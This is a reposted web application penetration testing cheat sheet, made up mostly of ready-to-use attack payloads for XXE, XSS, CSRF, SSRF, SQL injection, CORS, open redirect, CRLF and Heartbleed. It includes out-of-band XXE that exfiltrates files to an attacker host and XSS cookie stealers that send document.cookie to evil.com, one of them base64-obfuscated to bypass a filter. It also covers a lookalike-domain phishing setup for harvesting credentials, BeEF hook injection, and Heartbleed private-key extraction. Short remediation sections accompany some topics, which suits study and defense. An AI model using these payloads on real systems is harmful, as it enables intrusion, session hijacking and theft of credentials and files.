此文转载

XXE

VALID USE CASE

This is a nonmalicious example of how external entities are used:

<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [
<!ELEMENT copyright (#PCDATA)>
<!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml">
]>
<copyright>&c;</copyright>

Resource: https://xmlwriter.net/xml_guide/entity_declaration.shtml

TESTING METHODOLOGY

Once you've intercepted the POST to the vulnerable page, see if you can get the system to do what it would normally, but with entities:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">]
>
<methodCall><methodName>&test;</methodName></methodCall>

If that worked, let's see if you can read files off of the system:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "file:///etc/passwd">]
>
<methodCall><methodName>&test;</methodName></methodCall>

Or open a php file on the system:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]
>
<methodCall><methodName>&test;</methodName></methodCall>

This particular example should return a base-64 encoded string that when decoded will be the contents php file you've specified.

WEBGOAT 8

Test to see if we can add a comment with entities:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<comment><text>&test;</text></comment>

Now check if you can read a file off of the filesystem:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<comment><text>&test;</text></comment>

MUTILLIDAE

To grab files on mutillidae, use this payload on the vulnerable form input:

<?xml version="1.0"?> <!DOCTYPE a
[<!ENTITY TEST SYSTEM "file:///etc/passwd">]
> <methodCall><methodName>&TEST;</methodName></methodCall>

You can also omit the xml version:

<!DOCTYPE a
[<!ENTITY TEST SYSTEM "file:///etc/passwd">]
> <methodCall><methodName>&TEST;</methodName></methodCall>

as well as apply the getting the contents of a php file discussed above:

<!DOCTYPE a
[<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">]
>
<methodCall><methodName>&TEST;</methodName></methodCall>

OUT OF BAND

BASIC TEST

  1. Start burp collaborator and copy the payload to clipboard
  2. Put this into the XML file you're uploading:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>
  1. Upload it, see if a request gets sent
  2. If it does, move on to seeing if you can read files on the server using the code below

READ FILES

  1. Put this into the XML file you're uploading:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM
"file:///etc/lsb-release">
<!ENTITY % dtd SYSTEM
"http://<evil attacker hostname>:8000/evil.dtd">
%dtd;
]>
<data>&send;</data>
  1. Put this file on <evil attacker hostname> in evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;
  1. Host the dtd file:
python -m SimpleHTTPServer 8000
  1. Upload the XML file.

Resource: https://dzone.com/articles/out-of-band-xml-external-entity-oob-xxe

READ FILES USING FTP

  1. Put this into the XML file you're uploading:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
  1. Put this file on <evil attacker hostname> in xxe_file.dtd:
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">
  1. Host the dtd file:
    python -m SimpleHTTPServer 8090

  2. Run this ruby script on <evil attacker hostname>.

  3. Upload the XML file.

Resource: https://blog.zsec.uk/out-of-band-xxe-2/

This can also be used to save having to run two separate listeners: https://staaldraad.github.io/2016/12/11/xxeftp/

Some different payloads:
https://gist.github.com/staaldraad/01415b990939494879b4
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt

Some writeups worth checking out:
https://hackerone.com/reports/347139

RESOURCES

https://blog.zsec.uk/out-of-band-xxe-2/
https://pentesterlab.com/exercises/play_xxe/course
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection
https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER
https://www.youtube.com/watch?v=m6KP0wpBJpU
https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi
https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/
https://blog.detectify.com/2018/04/17/owasp-top-10-xxe/

XSS

FILE UPLOAD STRING XSS

If you find a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
Resource: https://twitter.com/xsspayloads/status/904945958592622592?lang=en

GIVE FILE XSS PAYLOAD AS NAME

cp somefile.txt \"\>\<img\ src\ onerror=prompt\(1\)\>

SVG

This is worth trying whenever you run across an image upload. Create a file, stuff.svg and put this into it:

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS!');
</script>
</svg>

Resource: https://medium.com/@friendly_/xss-at-hubspot-and-xss-in-email-areas-674fa39d5248

SVG #2

If you're testing a text editor on a system that you can also upload files to, try to embed an svg:

<iframe src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg" frameborder="0"></iframe>

If that works, upload an SVG with the following content and try rendering it using the text editor:

<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.domain)</script>
</svg>

Resource:
https://github.com/cure53/H5SC

XML

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

Resource: https://blog.it-securityguard.com/bugbounty-papyal-xml-upload-cross-site-scripting-vulnerability/

CSP BYPASS

This will work for script-src self<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Resource: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection

Another one specifically for firefox:

<object data="javascript:alert(1)">

**Resource:**https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass

GENERIC PAYLOADS

<svgonload=alert(1)>http://jsfiddle.net/23sqP/3/
<svg onload=alert(1)>
"><svg onload=alert(1)>
"onmouseover=prompt(1) //
<div onmouseover="alert('XSS');">Hello :)
"autofocus onfocus=alert(1)//
"autofocus onfocus=prompt(1) //
'-alert(1)-': Payload to stick in an event, like an onclick.
\'-alert(1)//
"+alert(1));<!--
'-prompt(1)//: Payload to stick in an event, like an onclick.
eval(atob('YWxlcnQoMSk=')): generate string with btoa('alert(1)')
1")%3balert(document.cookie%2b" - https://hackerone.com/reports/141244
?param=111/u0026;typ=55577%5D%22)%3balert(document.cookie)%3b// - https://hackerone.com/reports/146336; the /u0026; is &
<img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>
<iMg SrC=x OnErRoR=alert(1)>
"><img src onerror=alert(1)>
<div onmouseover="alert('XSS');">Move your mouse over me.
'"</Script><Html Onmouseover=(alert)(document.domain) //
</script><script>alert(1)</script>
</script><img onerror=prompt(1)>
\'-prompt(1)//
<img="" onerror="prompt()">
<img/onerror="prompt()">
"><input/onauxclick="[1].map(prompt)">
<iframe srcdoc="&lt;script>prompt(document.domain)&lt;/script/>"></iframe>

Tons of great payloads can be found here: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

<output name="jAvAsCriPt://&NewLine;\u0061ler&#161(1)" onclick="eval(name)">X</output>
Resource: https://twitter.com/joernchen/status/1086237923652046849

str<script>alert(1)<\/script>ing - give this a shot in a JSON value

</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
Resource: https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e)

Try this one in a field that takes emails:
x@x.com<--`<img/src=` onerror=alert(1)> --!>
Resource: https://medium.com/@friendly_/xss-at-hubspot-and-xss-in-email-areas-674fa39d5248

Some JSFuck action:
""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()
Resource: https://inventropy.us/blog/constructing-an-xss-vector-using-no-letters

This payload supposedly works only on Firefox according to the OWASP XSS filter evasion site. However, I've had luck with it in Chrome as well in the context of a stored XSS in a text editor-type application:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

TINY PAYLOAD

<base href=//0>

On your system, run the following command: echo "alert(document.domain)" | nc -lp80

Resource: http://brutelogic.com.br/blog/shortest-reflected-xss-possible/

POLYGLOTS

A polyglot I built based on this one:

oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e

Resource:
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

I've had some good successes with this one:

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(document.domain)//'>

Resource:
https://twitter.com/xsspayloads/status/663599944834617344

REACT

If you see dangerouslySetInnerHTML in source code, try something like this payload:

<img src=x onerror=console.log("XSS")>

Because console.log is not sandboxed, you should get a hit in your browser's console.

Thanks to Jason Tsang for this one.

BASIC AUTH CRED HARVESTER

If you run across a site that's vulnerable to stored XSS, but has the HTTPOnly flag set for the cookie, try harvesting their credentials with a basic auth prompt:

  1. Get a domain that looks reasonably close to that of your target.
  2. Download Phishery from here: https://github.com/ryhanson/phishery and compile the binary.
  3. Compile and run it
  4. Set this up for the payload: <img/src/onerror=document.location="https://evil.com/">
  5. Wait for creds to come in.

STEAL COOKIES

SIMPLE PAYLOAD TO STEAL COOKIES:

<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>

Blacklist bypass:
I came across a site recently that was blacklisting //:"<, and >. This is what I did to get around that issue:

btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')

gives you this string:
'ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='

Use this payload:

eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))

ANOTHER ONE:

<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>

Resource: https://www.lanmaster53.com/2011/05/13/stealth-cookie-stealing-new-xss-technique/

THIS ONE IS PRETTY AWESOME:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

SET UP LISTENER TO INTERCEPT:

nc -lvp 8090

or you can also use this:

python -m SimpleHTTPServer 8090

TEST SESSION HIJACKING

Use burp repeater, it makes it incredibly easy to play with different cookies, and understand the impact, especially with the render tab of the response.

Resources:
https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/
https://www.exploresecurity.com/a-tricky-case-of-xss/
https://brutelogic.com.br/blog/xss101/

FILTER BYPASS RESOURCES

Collection of awesome resources to deal with filters:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/
https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code
https://brutelogic.com.br/blog/avoiding-xss-detection/
https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

POST-BASED XSS

If you have a situation in which you can't turn your POST based XSS into a GET request (perhaps GET requests are disabled on the target server), give CSRF a try. This can provide you the opportunity to deliver your payload to a victim.

DOM-BASED XSS PAYLOADS:

<target.com>/#<img/src/onerror=alert("XSS")>

If jQuery is being used and you want to get a beef hook into place (be sure to modify the URL encoded string before using):

<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>

Another one from a James Kettle bug bounty submission:
#<img/src="1"/onerror=alert(1)>
Another one from here:
#><img src=x onerror=prompt(1);>

Resource: https://hackerone.com/reports/241619

Nice site for JS event keycodes:
http://keycode.info/

These sites have a ton of great payloads:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection
https://medium.com/@friendly_/xss-at-hubspot-and-xss-in-email-areas-674fa39d5248
https://zseano.com/tutorials/4.html
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html
http://www.xss-payloads.com/payloads-list.html?a#category=all

Could be useful for payload generation:
http://www.jsfuck.com/
https://github.com/aemkei/jsfuck
https://convert.town/ascii-to-text (Helpful to generate String.fromCharCode attacks)
http://jdstiles.com/java/cct.html (Also helpful to generate String.fromCharCode attacks)

RESOURCES

https://brutelogic.com.br/blog/file-upload-xss/
https://infosecauditor.wordpress.com/2013/05/27/bypassing-asp-net-validaterequest-for-script-injection-attacks/
https://brutelogic.com.br/blog/

This is a payload specifically for ASP.NET endpoints that will only work for stored XSS. It uses unicode to encode the angle brackets:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'

BLIND XSS

Blind XSS is a variant of stored XSS, where the payload may manifest in an area that you're not able to access.

Helpful writeups:

WEB APPLICATION TRANSFORMS DATA FROM LOWERCASE TO UPPERCASE

If you find an input where data is changed from lowercase to uppercase and the output is not encoded, try using HTML encoding to trigger the payload. For example:

<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
<svg><script>alert(1)</script></svg>
<img src=x onerror=prompt(1)>

Resource: https://security.stackexchange.com/questions/117798/how-can-i-execute-a-xss-when-a-web-application-transforms-a-data-from-lowercase

REMEDIATION

  • Validate and sanitize input
  • Encode output
    HTML Encoding:
& ---> &amp;
< ---> &lt;
> ---> &gt;
" ---> &quot;
' ---> '
/ ---> /
  • Set HttpOnly cookie attribute to true in order to prevent session hijacking
  • Use CSP

CONTENT SECURITY POLICY (CSP)

  • Help mitigate against XSS and data injection attacks
  • Does this by whitelisting URLs that the browser can load and execute JS from
  • Prevent inline javascript, or any js that comes from an untrusted URL
  • Configure web server to return Content-Security-Policy HTTP header or <meta> can be used to configure a policy

Example: all content should come from the sites own origin

Resources:
https://www.html5rocks.com/en/tutorials/security/content-security-policy/

CSRF

Some bypass techniques, even if a CSRF token is in place: https://zseano.com/tutorials/5.html

CSRF POC vs. REST API which can work if the target application isn't validating the request header:

<html>
<script>
function jsonreq() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST","https://target.com/api/endpoint", true);
xmlhttp.setRequestHeader("Content-Type","text/plain");
//xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.withCredentials = true;
xmlhttp.send(JSON.stringify({"test":"x"}));
}
jsonreq();
</script>
</html>

Resource: https://www.gracefulsecurity.com/csrf-vs-json/

CSRF on JSON endpoints with flash and redirects writeups:

CSRF TO REFLECTED XSS

This is a template to POC this sort of attack chain.

<html>
<body>
<p>Please wait... ;)</p>
<script>
let host = 'http://target.com'
let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E' function submitRequest() {
var req = new XMLHttpRequest();
req.open(<CSRF components, which can easily be copied from Burp's POC generator>);
req.setRequestHeader("Accept", "*\/*");
req.withCredentials = true;
req.onreadystatechange = function () {
if (req.readyState === 4) {
executeXSS();
}
}
req.send();
} function executeXSS() {
window.location.assign(host+'<URI with XSS>'+alert_payload);
} submitRequest();
</script>
</body>
</html>
  • If an endpoint uses PUT or DELETE, CSRF won't be possible (due to preflighting - https://w3c.github.io/webappsec-cors-for-developers/#cors), unless there is also a CORS misconfiguration. Be sure if you're testing this with burp and platform authentication that you turn off burp before you run your CSRF POC.

Resources:
https://security.stackexchange.com/questions/106105/exploiting-csrf-put-request
https://stackoverflow.com/questions/11833061/is-csrf-possible-with-put-or-delete-methods
https://security.stackexchange.com/questions/166724/should-i-use-csrf-protection-on-rest-api-endpoints
https://security.stackexchange.com/questions/149085/vuln-cross-origin-resource-sharing-arbitrary-origin-trusted
https://www.moesif.com/blog/technical/cors/Authoritative-Guide-to-CORS-Cross-Origin-Resource-Sharing-for-REST-APIs/

REMEDIATION AND PREVENTION

Ideally, this is something that should not be done from scratch. It's best to use a framework that does this work for you.

However, if you are dealing with a developer that is planning to roll their own, then:

  • Add a random token to each user session. The token should be sent with a POST request (GET requests have the means to leak the token in log files, browser history, etc.)

  • Generating a token per request can lead to usability problems, such as the back button not working properly.

  • Be sure that the token is only sent over TLS to avoid MITM issues.

DOUBLE SUBMIT COOKIE

This can be used for situations in which maintaining the state for a CSRF token on the server side is difficult. It's easy to implement and is stateless.

  • A random value is sent in both a cookie and as a request parameter
  • The server verifies the cookie value and request value match
  • When a user visits, the site should generate a cryptographically strong psuedorandom value and set it as a cookie on the user's machine separate from the session ID.
  • The site requires every request includes this value as a hidden form value, request header, or request parameter.
  • If they both match server side, the server accepts the request

It's not bulletproof unless your subdomains are fully secured and only accept HTTPS connections.

Including the value in an encrypted cookie alongside the authentication cookie and then matching the decrypted authentication cookie server side with the token in a hidden form field, request header, or request parameter is a solid choice. This is because a subdomain has no way to overwrite a properly crafted encryption cookie without the encryption key.

Resources:
https://security.stackexchange.com/questions/162/what-is-the-correct-way-to-implement-anti-csrf-form-tokens
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.md
https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/

SSRF

If you have control over a URL parameter and it's not a redirect, you should start hunting for SSRF.

It's also worthwhile to look at Webhooks, PDF generators, document parsers, and file uploads. More information can be found here

Some things to test:

See if there's a way to port scan internal assets: http://internal-server:22/notarealfile.txt

If you get an error message back, review the output to see if there is a difference and possible indicators between two ports to determine when you've found open vs closed. If there is no error message, determine if you can detect an open or closed port via the amount of time it takes for a requesat to time out.

Alternatively, out-of-band detection mechanisms are great as well. Use Burp Collaborator or set up a listener: nc -l -n -vv -p 8080 -k.

In my experience, some of the vulnerable components have only worked with certain ports, such as 80, 8080, 443, etc. It's good to test against these ports to make sure you aren't missing something.

If you have an endpoint that appends a path to your payload, try adding a & or a # to the end of your payload like so:

http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000&
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#

If there's a parser looking for a specific IP address, try decimal IP notation.

REDIRECT TO BYPASS BLACKLISTS

  1. Create index.php with the following:
<?php header("location: http://7fnx2igehoqg54bq0ig52wl8xz3rrg.burpcollaborator.net"); ?>
  1. Host it (but be careful in doing this as it does introduce a security vulnerability on the system you're on): sudo php -S <your ip>:80 -t .
  2. Specify your host for the target site in the vulnerable application

Resource: https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b

This has a great write-up on SOP and CORS, as well as SSRF: https://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/

Bug Bounty Write-ups:
https://hackerone.com/reports/115748
https://hackerone.com/reports/301924
https://www.sxcurity.pro/hackertarget/
http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf
https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf
https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/

Payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF injection

RESOURCES

http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
http://blog.safebuff.com/2016/07/03/SSRF-Tips/
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://securingtomorrow.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/
https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/

REMEDIATION

  • Disable unused URL schemas such as filedictftp, and gopher
  • Whitelist the DNS name or IP address your application needs to access
  • Validate user input

RECON

https://medium.com/@adrien_jeanneau/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d

SQL INJECTION

USING SQLMAP TO TEST A SITE WITH JWT AND BASIC AUTH:

sqlmap -u https://target --headers="X-Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDkzNjEwNSwiZXhwIjoxNTU0OTM2MjI1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.CUJeDfpJCBD-RKCkGe6q5U2byv0rkxZnRhvPwyFYglg" --data={"note":"asdf","id":"1*"} --level=5 --risk=2 --dbs --auth-type=basic --auth-cred=user:password -vvvv

--data: used to specify post data
*: used to tell sqlmap where to try injecting, if you haven't specified a parameter with -p

Resources:
https://github.com/sqlmapproject/sqlmap/issues/646

TEST FOR SQLI IN PUT REST PARAMS WITH SQLMAP:

  1. Mark the Vulnerable parameter with *
  2. Copy the request and paste it into a file.
  3. Run it with sqlmap:
    sqlmap -r <file with request> -vvvv

Use tamper scripts to tell sqlmap how to encode its injections.

JSQL

Developers seemed to respond well to this

Cheatsheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Resource: https://www.sxcurity.pro/asus-sqli/

Try double encoding input, i.e. try this: https://site.com/q/getjson.php?s=%2527

Resource: https://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/

SESSION FIXATION

A quick sanity check that can be used to determine if Session Fixation is an issue on a site:

  1. Go to the login page, observe the session ID that the unauthenticated user has.

  2. Login to the site. Once in, observe the session ID that the user has. If the session ID matches the one that was given by the site before the user authenticated, you are looking at a session fixation vulnerability.

FILE UPLOAD VULNERABILITIES

Create test 10gig file on OS X (useful for testing file upload limitations):
mkfile -n 10g temp_10GB_file

UNRESTRICTED FILE UPLOAD

RESOURCES

http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html

OTHER CHEATSHEETS

https://github.com/jhaddix/tbhm

CORS MISCONFIGURATION

Basic POC for testing (loosely based off of https://www.sxcurity.pro/tricky-CORS/ and https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/):

<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2> <div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div> <script>
function cors() {
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
// If you want to print something out after it finishes:
//alert(req.getAllResponseHeaders());
//alert(localStorage.access_token);
}
};
// If you need to set a header (you probably won't):
// req.setRequestHeader("header name", "value");
req.open("GET", "<site>", true);
req.withCredentials = true;
req.send();
}
</script>
</body>
</html>

RESOURCES

https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/
http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
https://www.youtube.com/watch?v=wgkj4ZgxI4c
http://ejj.io/misconfigured-cors/
https://www.youtube.com/watch?v=lg31RYYG-T4
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
https://w3c.github.io/webappsec-cors-for-developers/#cors
http://gerionsecurity.com/2013/11/cors-attack-scenarios/
Using CORS misconfiguration to steal a CSRF Token:
https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/

TESTING FOR HEARTBLEED

nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d

STEAL PRIVATE KEY:

wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
echo "<target>:<port>" > targets.txt
python heartbleed.py -f targets.txt -v -e

READ THROUGH THE MEMORY:

wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py
python heartbleed-poc.py <target> -p <target port> | less

You can also run strings on the subsequent dump.bin file that is created if you prefer.

RESOURCES

https://gist.github.com/bonsaiviking/10402038
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py

GET BURP SUITE WORKING WITH CHROME ON OSX

  1. Download the Burp certificate by going to http://burp and clicking CA Certificate
  2. Go to Keychain Access
  3. Click File -> Import Items
  4. Click the "I" icon in the lower left hand side of the window
  5. Click the arrow next to Trust
  6. Change When using this certificate: to Always Trust
  7. Restart Chrome

WHAT IS THE DOM?

This probably belongs at the top of this article, but I found this article recently thanks to this page, and found the explanation to be simple, concise, and to the point: https://css-tricks.com/dom/. Definitely something I wish I had found when I was getting started in this field.

OPEN REDIRECT

Open redirect to XSS: http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html

Payloads:
https://github.com/cujanovic/Open-Redirect-Payloads/blob/master/Open-Redirect-payloads.txt

OPEN REDIRECT TO XSS BEEF PAYLOAD:

<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

Use the Decoder in Burp to encode this to base-64, and deliver it for the payload:

data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==

Other payloads to try:
http://;URL=javascript:alert('XSS')
data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
javascript://%0aalert(1)
javascript://%0dalert(1)
ja\nva\tscript\r:alert(1)//?
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)//?

This site has a ton of payload ideas: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open redirect

Resources:
http://blog.beefproject.com/2013/03/subverting-cloud-based-infrastructure.html

CRLF INJECTION

If you see your input parameter for a request:

http://inj.example.org/redirect.asp?origin=foo

echo'd back in the response headers:

HTTP/1.1 302 Object moved
Date: Mon, 07 Mar 2016 17:42:46 GMT
Location: account.asp?origin=foo
Connection: close
Content-Length: 121 <head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

You should try CRLF injection:

http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a

CRLF: %0d%0a

RESOURCES

https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545
https://www.gracefulsecurity.com/http-header-injection/
https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
https://www.acunetix.com/websitesecurity/crlf-injection/
https://blog.innerht.ml/twitter-crlf-injection/

TEMPLATE INJECTION

ANGULAR

Some code you can throw into jsfiddle for payload testing:

<html>
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
<div ng-app>
{{constructor.constructor('alert(1)')()}}
</div>
</body>
</html>

RESOURCES

http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

RCE

BYPASS AV WITH WEBSHELL UPLOADS (.NET):

Take a known webshell, and modify strings such as function names and the title (if applicable).

